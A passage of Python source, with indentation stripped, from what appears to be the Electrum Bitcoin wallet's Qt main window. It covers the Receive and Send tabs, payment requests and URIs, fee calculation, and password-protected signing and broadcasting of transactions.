if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
self.feerate_e.setAmount(fee_rate // 1000)
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if not edit_changed.get_amount():
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 2 if self.fee_unit else 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
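# Recolour the amount/fee/feerate fields: red when funds are insufficient,
# blue for values that were auto-filled rather than typed by the user.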
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates():
self.statusBar().showMessage(_('Waiting for fee estimates...'))
return False
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
displayed_feerate = displayed_feerate // 1000 if displayed_feerate else 0
displayed_fee = displayed_feerate * size
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = displayed_fee // size if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
if feerounding:
self.feerounding_icon.setToolTip(
_('additional {} satoshis will be added').format(feerounding))
self.feerounding_icon.setVisible(True)
else:
self.feerounding_icon.setVisible(False)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
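# A fee (or fee rate) counts as "frozen" when the user typed it manually and the
# field still holds that value; frozen values are not overwritten automatically.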
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
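# Returns an absolute fee amount, a fee-rate based estimator (a callable), or
# None to let the wallet choose the fee automatically.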
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount()
amount = 0 if amount is None else amount
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
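# Validate the Send tab and collect everything needed to build the transaction;
# returns (outputs, fee_estimator, label, coins), or None if validation fails.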
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.') % alias + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Bitcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Bitcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
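# Broadcast on a background thread; on success, mark any matching payment
# request as paid and send the payment-request ACK with a refund address.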
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture the current top-level window; the override might be removed before broadcast_done runs
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
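# Handle a 'bitcoin:' URI: either fetch the referenced payment request
# (r / name+sig parameters) or fill the send tab fields directly.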
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l, l.get_list_header())
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
